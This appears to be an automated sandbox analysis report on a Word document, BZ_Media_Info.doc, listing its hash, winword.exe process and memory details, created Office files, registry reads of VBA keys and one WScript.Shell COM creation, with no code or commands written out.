8ad2860416f81070b57d262e8dcb2894048f18c8989f9c24a870a1582c2129a2 (SHA256)
BZ_Media_Info.doc
Word Document
Created at 2018-03-29 15:42:00
Notifications (2/3)
The overall sleep time of all monitored processes was truncated from "23 seconds" to "10 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
516
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:21, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x5a8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
9FC
0x
9F4
0x
9F0
0x
9E0
0x
9D8
0x
9D4
0x
9CC
0x
9C8
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9AC
0x
98C
0x
988
0x
984
0x
980
0x
97C
0x
96C
0x
A34
0x
A38
0x
A3C
0x
A44
0x
A48
0x
A4C
0x
A50
0x
A54
0x
A58
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A8C
0x
B1C
0x
B20
0x
B44
0x
588
0x
9D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01b70000 | 0x01e3efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e40000 | 0x01e40000 | 0x02232fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002240000 | 0x02240000 | 0x02241fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002250000 | 0x02250000 | 0x02252fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02261fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0237ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x02417fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x024d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x02507fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x02510fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002520000 | 0x02520000 | 0x02520fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x0281efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02824fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0293ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002940000 | 0x02940000 | 0x02941fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x02950000 | 0x0295bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02960000 | 0x02967fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02970000 | 0x0297ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002980000 | 0x02980000 | 0x02980fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02990fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02a9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x02aa0000 | 0x02b5ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02bcafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002cd0000 | 0x02cd0000 | 0x02cd0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02ce0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002e00000 | 0x02e00000 | 0x02e01fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| msxml6r.dll | 0x02e10000 | 0x02e10fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02e20000 | 0x02e3ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002e40000 | 0x02e40000 | 0x02e40fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002e80000 | 0x02e80000 | 0x02f7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fa0000 | 0x02fa0000 | 0x0301ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| segoeui.ttf | 0x03020000 | 0x0309efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x030cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x0314ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000033b0000 | 0x033b0000 | 0x034affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000034b0000 | 0x034b0000 | 0x038affff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003950000 | 0x03950000 | 0x03a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03bcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003bf0000 | 0x03bf0000 | 0x03bfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003c00000 | 0x03c00000 | 0x03c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003c10000 | 0x03c10000 | 0x0400ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004080000 | 0x04080000 | 0x0417ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x042fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0440ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004420000 | 0x04420000 | 0x0451ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0464ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004650000 | 0x04650000 | 0x04e4ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x05192fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x0524ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005250000 | 0x05250000 | 0x052cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005380000 | 0x05380000 | 0x0547ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005480000 | 0x05480000 | 0x055b1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005690000 | 0x05690000 | 0x0578ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005790000 | 0x05790000 | 0x0588ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000058c0000 | 0x058c0000 | 0x059bffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x059c0000 | 0x062effff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000006320000 | 0x06320000 | 0x0641ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006420000 | 0x06420000 | 0x0649ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000065f0000 | 0x065f0000 | 0x065fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000066d0000 | 0x066d0000 | 0x067cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000067e0000 | 0x067e0000 | 0x068dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000068e0000 | 0x068e0000 | 0x070dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000071c0000 | 0x071c0000 | 0x0723ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000007260000 | 0x07260000 | 0x0735ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000007360000 | 0x07360000 | 0x0835ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008510000 | 0x08510000 | 0x0858ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008590000 | 0x08590000 | 0x0898ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000036e00000 | 0x36e00000 | 0x36e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000036f30000 | 0x36f30000 | 0x36f3ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| osppc.dll | 0x748b0000 | 0x748e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770c0000 | 0x770c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winword.exe | 0x13ff20000 | 0x1400fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febcee0000 | 0x7febcee0000 | 0x7febceeffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febe330000 | 0x7febe330000 | 0x7febe33ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee4890000 | 0x7fee4a03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee4a10000 | 0x7fee4caafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| adal.dll | 0x7fee4cb0000 | 0x7fee4dc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee4f00000 | 0x7fee4f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fee4fa0000 | 0x7fee500efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee5010000 | 0x7fee518dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee5190000 | 0x7fee535ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee5360000 | 0x7fee54fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwintl.dll | 0x7fee5500000 | 0x7fee55bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee55c0000 | 0x7fee99a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7fee99b0000 | 0x7feea6a4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feea6b0000 | 0x7feeaaecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7feeaaf0000 | 0x7feeabd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feeabe0000 | 0x7feec60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso98win32client.dll | 0x7feec610000 | 0x7feed2b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso50win32client.dll | 0x7feed2c0000 | 0x7feed34afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feed350000 | 0x7feede1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7feede20000 | 0x7feee503fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oart.dll | 0x7feee510000 | 0x7feef494fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwlib.dll | 0x7feef4a0000 | 0x7fef1c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mlang.dll | 0x7fef1c80000 | 0x7fef1cbafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7fef1df0000 | 0x7fef2292fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef22a0000 | 0x7fef233bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2340000 | 0x7fef2405fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x7fef3920000 | 0x7fef393bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x7fef3940000 | 0x7fef39a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x7fef4770000 | 0x7fef477bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| c2r64.dll | 0x7fef4cc0000 | 0x7fef4ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| appvisvsubsystems64.dll | 0x7fef4eb0000 | 0x7fef50e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 461 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.settings.json | 0.08 KB |
MD5:
e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1: 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 SHA256: 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyhistorystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyeventactivitystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\otele\{7c776c18-8b8d-4fca-999c-a5a4280ba143} (0) - 2408 - winword.exe - otele.dat | 1.89 KB |
MD5:
6244ff86f2ab13fade4d6310f436e939
SHA1: f92feac710e9a968b5b6137fa812a2dd45600a65 SHA256: 14a9de9a6354d8a478947981e93a723a39d0383d925e9a2fb25c10c214ca725a |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | wsCript.shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (67)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 105, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 105 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
